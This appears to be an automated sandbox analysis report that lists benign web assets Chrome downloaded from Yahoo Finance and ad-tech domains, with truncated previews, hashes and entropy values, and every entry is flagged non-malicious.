                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/Change.DtNqnL99.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as v,p as g,k as h,n as s,i as o,A as w,e as q,t as V,d as C,f as E,h as S,B as k,l as A,J as H}from"./scheduler.Dsuh-FKt.js";import{g as N}from"./spread.CgU5AtxT.js";import{S as R,i as B}from"./index.CvwOawEI.js";function F(i){const e=i.slice(),t=e[4]||{};return e[10]=t.fmt!==void 0?t.fmt:"-",e[11]=t.raw!==void 0?t.raw:"-",e}function y(i){let e,t=i[10]+"",_,u,n,a,d=[{"data-test":"change"},{"data-symbol":i[3]},{"data-field":u=i[1].id},{"data-trend":"none"},{"data-pricehint":n=i[0].original.priceHint},{"data-value":a=i[11]},i[2]?{active:""}:{}],f={};for(let l=0;l<d.length;l+=1)f=w(f,d[l]);return{c(){e=q("fin-streamer"),_=V(t),this.h()},l(l){e=C(l,"FIN-STREAMER",{"data-test":!0,"data-symbol":!0,"data-field":!0,"data-trend":!0,"data-pricehint":!0,"data-value":!0});var c=E(e);_=S(c,t),c.forEach(o),this.h()},h(){k(e,f)},m(l,c){h(l,e,c),A(e,_)},p(l,c){c&16&&t!==(t=l[10]+"")&&H(_,t,f.contenteditable),k(e,f=N(d,[{"data-test":"change"},c&8&&{"data-symbol":l[3]},c&2&&u!==(u=l[1].id)&&{"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (11041)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):11042
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.771503134697231
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:Vj0sYNFABA33RVeSjo3vFzn3QgDaN8hk01PFIDd3Kk9/knb5d9kU8+1hn8P1cSgN:l0sYNFABA33RVeSjofFzngUaN8hk01P7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:AE62A1F35C667718DC7A0C91189A6E35
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:1C3860B72EAD9B1AAE9BDCA9A35ADCB6B812C830
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:9E939528C40D4AFDBB6104C12BED9D59AECFD45F64B778B85AFAB28B513200BF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:C399E147465D61EAB5458EEED84E291B81062505C886FA2BF1231E81FEE7DC41B37D4607107ABCA9770FAA9FCCFA1EC621F9E319F00C00AA7815D9E894FEEC8C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/assets/Button.D4GRMVdO.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:button.yf-15mk0m{--button-background-color:var(--background-color, transparent);--button-transition-duration:.15s;--button-width:var(--button-width, max-content);background-image:var(--button-background-image);background-color:var(--button-background-color);transition-property:background-color,background-image,box-shadow,color,border-color;transition-duration:var(--button-transition-duration);transition-timing-function:ease-in-out;border-color:var(--button-border-color, transparent);border-width:1px;border-style:solid;font-weight:var(--font-medium);max-width:var(--button-width);cursor:pointer;display:inline-flex;align-items:center;justify-content:flex-start;gap:var(--space-1)}button.rightAlign.yf-15mk0m{flex-direction:row-reverse}button.rounded.yf-15mk0m{border-radius:var(--border-radius-xl)}button.primary-btn.fin-size-x-small.yf-15mk0m,button.primary-destructive-btn.fin-size-x-small.yf-15mk0m,button.secondary-btn.fin-size-x-small.yf-15mk0m,button.secondary-destructive-btn.fin-size-x-s
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1087
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.120392827929451
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:tCbYLdLGSKGQlnGMGlTIqdhg1a4x0KKGSyFzWIS66AvIS6RAytgI:DJGSdQMH76k96gsK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:B182D19798F0D66CA701301E28C0034A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:52C014BAA654A9E6B73CAC335FEFDB7B39B6B123
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:804F7150640198DF0AAC95F7499EC183FFED8AB411CCF16C5D96D3D83A75E063
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:238044791F93191D6899F784C114A4DC4F610A55BCA1BCCB75CDCC9A2799617ECB63C49546623AB20474EDCF6A38642708093E03EA32C39E77A190970B06E750
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/cv/apiv2/weather-svg/SHOWERS.svg
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:<svg width="48" height="48" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">. <defs>. <linearGradient x1="64.278%" y1="100%" x2="64.278%" y2="1.351%" id="a">. <stop stop-color="#B5BDC8" offset="0%"/>. <stop stop-color="#C7CDD2" offset="21.044%"/>. <stop stop-color="#E5EBEF" offset="100%"/>. </linearGradient>. <path d="M44 15.23c0 8.462-6.77 15.232-15.23 15.232H9.307C4.23 30.462 0 26.23 0 21.154s4.23-9.308 9.308-9.308c1.523 0 3.046.339 4.4 1.185C14.892 5.585 21.154 0 28.769 0 37.231 0 44 6.77 44 15.23z" id="b"/>. </defs>. <g fill="none" fill-rule="nonzero">. <g transform="translate(2 2)">. <use fill="url(#a)" xlink:href="#b"/>. <use fill-opacity=".05" fill="#7DCBFF" xlink:href="#b"/>. </g>. <path d="M35.914 42.972c-.612 2.255-2.858 3.485-4.9 2.87-2.244-.615-3.47-2.87-2.857-4.92C28.565 38.87 33.67 36 33.67 36s2.857 4.921 2.245 6.972zM21.914 42.972c-.612 2.255-2.858 3.485-4.9 2.87-2.244-.615-3.47-2.87-2.857-4.92C1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (741)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):940
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.441535325540667
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:2e2C6hHfhiVIKopyZGbrT4Ac2RSRPYE8e+tEIKj:2e2C6lIYyZ0of79YEw2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:4431E1AB669EDEBACFE9A894B3BBC6E6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:026850F89C82BBE443E8705CF04494EB6150F368
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:D9739CE77E2504B7F016A98E8F8A98DCD8B82B4C55918A98DE78D360ABF35808
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:40900F54F8CFEFBCBBE7B5AFE0AA5F424E708F2A50BE8F3149AEA4823B892A5BDFCE85D9C422025F203A0AF292D1C92FE355DD5F8DC585B976AD7AC22A8AEAEB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://u.openx.net/w/1.0/cm?id=891039ac-a916-42bb-a651-4be9e3b201da&ph=a3aece0c-9e80-4316-8deb-faf804779bd1&gdpr=0&gdpr_consent=&r=https%3A%2F%2Fpbs.yahoo.com%2Fsetuid%3Fbidder%3Dopenx%26gdpr%3D0%26gdpr_consent%3D%26gpp%3DDBAA%26gpp_sid%3D-1%26f%3Di%26uid%3D%7BOPENX_ID%7D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:<html>.<head><title>Pixels</title></head>.<body>.<script>if("browsingTopics"in document&&document.featurePolicy.allowsFeature("browsing-topics"))document.browsingTopics()</script>..<img src="https://pbs.yahoo.com/setuid?bidder=openx&gdpr=0&gdpr_consent=&gpp=DBAA&gpp_sid=-1&f=i&uid=b004b482-f986-09fe-359b-b9b5938edfca"><img src="https://pixel-sync.sitescout.com/dmp/pixelSync?nid=4&gdpr=0"><img src="https://pixel.tapad.com/idsync/ex/receive?partner_id=1955&partner_device_id=8fa448b1-1b1e-0790-14f6-e1762159dc4b"><img src="https://ups.analytics.yahoo.com/ups/58294/sync?_origin=1&uid=a71eb8c4-9873-005e-0d30-b8aa8576e92e"><img src="https://us-u.openx.net/w/1.0/cm?id=e508c905-ddce-4732-92a4-0b0f5b72a28f&r=https%3A%2F%2Fid.rlcdn.com%2F464246.gif%3Fpartner_uid%3D%7BOPENX_ID%7D"><img src="https://ib.adnxs.com/getuid?https://us-u.openx.net/w/1.0/sd?id=537072399&val=$UID"><img src="https://ad.turn.com/r/cs?pid=9&gdpr=0">..</body>.</html>.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PNG image data, 1 x 1, 1-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):95
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.347811435468635
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:yionv//thPlE+kSI+Dtmy/Y+sR3Qhl/Y3WlED//jp:6v/lhPfkCDtmywFghu3WlEDTp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:71A50DBBA44C78128B221B7DF7BB51F1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:0EC63B140374BA704A58FA0C743CB357683313DD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:3EB10792D1F0C7E07E7248273540F1952D9A5A2996F4B5DF70AB026CD9F05517
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:6AD523F5B65487369D305613366B9F68DCDEEE225291766E3B25FAF45439CA069F614030C08CA54C714FDBF7A944FAC489B1515A8BF9E0D3191E1BCBBFE6A9DF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://pixel.tapad.com/idsync/ex/receive?partner_id=1830&partner_device_id=07c89b85-4c1c-424d-8df0-0123ed6cebb6&ttd_puid=27d97432-f92a-465d-8317-0711a36cc1a6%2C%2C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.PNG........IHDR.............%.V.....PLTE....z=.....tRNS.@..f....IDAT..c`.......!.3....IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (11511)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):11512
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.207281632130634
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:kSQrVEwQCZi8oVunjYGKS5ZqevSW0HejXq3lUhf7HrcL/VNdZYjhszGccP6LlUAE:wpEwQCZiVuKWZZSW0oXq3lUhjHYDVdY/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:63E46B4B96C6FD3C6B2A75337DEA3EC2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:EEA572A209C01660E730FCB6D02D81DD8DD344AB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:046B25044BE7EC5663B4EB65D8EEC9D94BC9835F75A34F66F20FF9E1C1778177
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:DFD83BF186A21B542FD55F1B5BB80AAA2163B77079E31B52C19DD4B6EF1579697A91F68438C1A650305D1EEC4B79F1A436A5B44BF1CCBE88820422B2131871C4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/scheduler.Dsuh-FKt.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:var U=Object.defineProperty;var J=(t,e,n)=>e in t?U(t,e,{enumerable:!0,configurable:!0,writable:!0,value:n}):t[e]=n;var f=(t,e,n)=>(J(t,typeof e!="symbol"?e+"":e,n),n);function M(){}const wt=t=>t;function K(t,e){for(const n in e)t[n]=e[n];return t}function Q(t){return t()}function Et(){return Object.create(null)}function V(t){t.forEach(Q)}function X(t){return typeof t=="function"}function vt(t,e){return t!=t?e==e:t!==e||t&&typeof t=="object"||typeof t=="function"}let p;function D(t,e){return t===e?!0:(p||(p=document.createElement("a")),p.href=e,t===p.href)}function S(t){return t.split(",").map(e=>e.trim().split(" ").filter(Boolean))}function Tt(t,e){const n=S(t.srcset),i=S(e||"");return i.length===n.length&&i.every(([s,o],r)=>o===n[r][1]&&(D(n[r][0],s)||D(s,n[r][0])))}function kt(t){return Object.keys(t).length===0}function P(t,...e){if(t==null){for(const i of e)i(void 0);return M}const n=t.subscribe(...e);return n.unsubscribe?()=>n.unsubscribe():n}function Nt(t){let e;return P(t,n=>e=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (65468)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):166614
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.276560343469419
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3072:V9PgHCrtvhWWI4CboEp5S72caTyUvSiZ0b:QiiWIVoEDW2ca/ZI
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:85A9AC4F2E1C8AB2C6142890725412F2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:0E382093EBC245CED328FC6536A78FBF49467B67
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:02EAA561A6E1B8809F1214C19F8738C9306010A97DAA520BFF7664DB29CAC7D7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:CEBC72746583D279110B99717B7142B214DF14B3715A0F8C27E53C69115B6ACA5351347AB45EB97DCC0B73388E9BED313C658290B63755F82DA7EB82942819AA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://static-cdn.spot.im/production/launcher/tags/v3.23.0/launcher/720-bundle.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:/*! For license information please see 720-bundle.js.LICENSE.txt */.(self.webpackChunk_spotim_launcher=self.webpackChunk_spotim_launcher||[]).push([[720],{3620:(e,t,n)=>{"use strict";Object.defineProperty(t,"__esModule",{value:!0});var r=n(80648);function a(e){var t=e.element,n=e.onAttributesChanged;t&&MutationObserver&&new MutationObserver((function(e){var t=e.filter((function(e){return"attributes"===e.type&&e.attributeName}));if(t.length>0){var r,a=null==(r=t.find((function(e){return e.target})))?void 0:r.target;null==n||n(a,t)}})).observe(t,{attributes:!0})}function o(e){var t=e.element,n=e.onRemoved;t&&MutationObserver&&t.parentNode&&new MutationObserver((function(e,r){e.some((function(e){return Array.from(e.removedNodes).indexOf(t)>-1}))&&(n(e[0].removedNodes[0]),r.disconnect())})).observe(t.parentNode,{childList:!0})}t.exposeAnimationEvents=function(e,t){void 0===t&&(t={}),e&&e.shadowRoot&&e.shadowRoot.addEventListener("animationstart",(function(e){var n;if(!e.detail||!e.detail.i
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PNG image data, 85 x 68, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):61
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.014960565232002
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:yionv//thPlw7tn/dLWtxl/k4E08up:6v/lhPCRK7Tp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:F869F09870417E960DED66D97A6090B6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:490F1F79C51B26F8DA759C4562136E45ADAEE00E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:3BC2620019E1B8A2BD5160BD5AB22C76D29EE171ECA86B602C91FCF71AC927F7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:D5B7858D0E2515B8F6A4FB92D1DE42BE0935F37BE3A175EDA3FC665EA14FEDAA57DA3318EF1ADFE407B717683A7DE6B2907A763BDCC285EDE9521444995A3A42
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.PNG........IHDR...U...D........3....IDAT.....$.....IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PNG image data, 600 x 400, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):309382
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.998616289152378
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:6144:3F25IHGxUkOcaBzWtyyKGaXI6KdyJRPKlwnAuyWAgvBB23:c5ImBOFz87hwI72A9dgvP6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:558354A890D9D46D30D76B9B1510AE5C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:82A88673B1FD0FEB7768FE6C04515012145AC8A6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:09E13695493287F2BDAE4C003A75F5C2266D821D50C93D02003066DA5CB60C06
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:DF42F1F0BA66AAFA58A47C3DEDD58DA836439A87106A0B668936219B2C6B49B7FB36C94CEFC0BC85B457105CDB8038377EE5135826B4187D6FFF93C90E14AE74
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.aolcdn.com/aoldotcom-releases/games/masque/SolitaireClassic_600x400.png
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.PNG........IHDR...X..........W......tEXtSoftware.Adobe ImageReadyq.e<...viTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:a47b1bdf-5d4a-5941-a465-9a200835b13a" xmpMM:DocumentID="xmp.did:C40BF620290C11E692B6DFB3F2923E1A" xmpMM:InstanceID="xmp.iid:C40BF61F290C11E692B6DFB3F2923E1A" xmp:CreatorTool="Adobe Photoshop CC 2015 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:f7a3807c-438f-da49-8d9d-824321111911" stRef:documentID="xmp.did:a47b1bdf-5d4a-5941-a465-9a200835b13a"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.......IDATx..}..%U.....^.89...3...
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (65484)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):184464
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.449610683212188
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:CmzNNlFchunXBo4P5/vurL73G8HbREzC1H9RrMrjbJPySO+/U+wSS60ibrLr2pmx:CmzNNlFchunXBhPh90iWglWO/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:6863CE0703CE4F482389F8A7E640E4E6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:7554A71C742AD65ADA09C7819E853F2F71D88D52
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:D08DEDFB38AA5AE7DEDADCAE8425F632C17CE61ABA51990D9275FB71A2B28387
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:36FA691795A4125FC052D4A75FEAB5B83059676B66C8D927E28EE56AC66B0BFA73021CB26C66953E49C3BDE0D41005D67D6F15D26AD8DA6140C5153EB9488390
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:/*! CMP 6.4.1 Copyright 2018 Oath Holdings, Inc. */.!function(){var e={4184:function(e){"use strict";function t(e){return(t="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e})(e)}e.exports=function(){for(var e,n,r=[],i=window,o=i;o;){try{if(o.frames.__tcfapiLocator){e=o;break}}catch(e){}if(o===i.top)break;o=o.parent}e||(function e(){var t=i.document,n=!!i.frames.__tcfapiLocator;if(!n)if(t.body){var r=t.createElement("iframe");r.style.cssText="display:none",r.name="__tcfapiLocator",t.body.appendChild(r)}else setTimeout(e,5);return!n}(),i.__tcfapi=function(){for(var e=arguments.length,t=new Array(e),i=0;i<e;i++)t[i]=arguments[i];if(!t.length)return r;"setGdprApplies"===t[0]?t.length>3&&2===parseInt(t[1],10)&&"boolean"==typeof t[3]&&(n=t[3],"function"==typeof t[2]&&t[2]("set",!0)):"ping"===t[0]?"function"==typeof t[2]&&t[2]({gdprApplies:n,c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (17568)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):17569
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.545289701504258
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:39AXgyZJ7cJIN/21WlAw0MNMZ0VN65yZLJQHR2J73VurhClr5ELNQzK7:39AXZZJ7cJINu1gAw0IMZ0VN65yZLJZa
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:D2D1FC84D2C0AE7514AAB4D9BD2DE3CC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:F197503002339E3DB1B7B6F271ED74332699F939
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:7E219F72C23D440EA2833D5FA8044D9F5A75DA45EABB46B0104A1B8421215BE7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:AB2F4D10ABB6B2EB3BD0F986B83D52BE708CD81A25FB4E4EFD0101254CE30923FB1CBADEFEFD59378DB57E76E05E2EE26C6863D3C35F421780DC586EB0946D81
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as se,Q as Se,e as E,t as j,b as H,d as w,f as T,i as g,h as Y,j as G,q as $,k as U,l as h,m as fe,S as ve,I as Ie,n as ae,K as ee}from"./scheduler.Dsuh-FKt.js";import{S as ne,i as re,h as Ce,c as R,b as A,m as D,t as k,a as N,d as O,g as ge,e as he}from"./index.CvwOawEI.js";import{C as $e,Q as Ee}from"./ResearchReports.JkjKkfCF.js";import{C as we}from"./AdvancedChartLink.kjUuQkM-.js";import{a as Te}from"./chartUtil.-voOXoQ6.js";import{C as ke}from"./Conversations.CDNUlVzo.js";import{S as te}from"./SectionHeader.NLJaoS9L.js";import{t as z,ai as Z}from"./commonUtil.BWwawKjd.js";import{D as ie}from"./DataTable.BDsezPzK.js";import{S as le}from"./SectionFooter.xjeo4TXG.js";import{S as ye,O as _e}from"./Select.DMUNtRO-.js";import{G as pe}from"./GradientScale.DbBrCr3C.js";import{S as Me}from"./loadIndustry.DEzBPHyD.js";function Ne(a){let e,t,s,n,r=(a[1]||"")+"",l,i,o,c,y,V=a[5].name+"",b,S,C,P=a[5].symbol+"",Q,d,u,I,m,_,B,f,p,W,L,q;function x(v){a[7](v)}let F={chartSettings:a[2],cha
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (1030)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1031
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.252415287435821
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:GvcMnL+dnRRBaWR3RAtIs6QDya3LtcHa/KN73vcqV5OisyTwDJ5:GvjCdnRRBaWhkT3xzCN7RVQ7UwDJ5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:68B09977263AEAE9E7E4AC9A32ED2655
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:1AD5E5DF08709D667C5802F7365066C2F7BB7E85
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:26DF2BD601F6609877141D1D0B2E279156644A2392601F62D70D593E59DD6793
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:C7D5F014285BC113FA43ECE7BEDAC650BB8CFF20B86448583A2CD7F13C52D3C72B9A357B3AB97A355DAFC6AEFF041B25D8BFCBE1BF0EE7CCF6AC949EC29583E1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/loadTrendingTickers.Gfe2o7QB.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{c as T,d as k}from"./commonUtil.BWwawKjd.js";import{f as m,l as h}from"./logUtil.CCV3qKPL.js";async function w(i,{count:a=25,silent:n=!1,quoteType:o="ALL",force:t=!1,critical:l=!1,fields:u=[]}){var f,c;const[e]=await T(["trendingTickers"],i),g=await k(i);if(e.getTrendingTickers().length>=a&&!t)return e.getTrendingTickers();try{const r=await m(i,{pathname:`/v1/finance/trending/${(g==null?void 0:g.region)||"US"}`,perfLabel:"loadTrendingTickers",query:{count:typeof a=="number"?String(a):a,fields:["logoUrl","longName","shortName","regularMarketChange","regularMarketChangePercent","regularMarketPrice",...u].join(","),format:"true",useQuotes:"true",quoteType:o}}),{result:s,error:d}=(r==null?void 0:r.finance)||{};return d||!s?(e.setError(d),null):(n||e.updateTrendingTickers((f=s[0])==null?void 0:f.quotes),n||t?(c=s[0])==null?void 0:c.quotes:e.getTrendingTickers())}catch(r){if(h(i,{count:a,silent:n,force:t,quoteType:o},{data:r,perfLabel:"loadTrendingTickers",isCritical:l}),n||e.setError
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
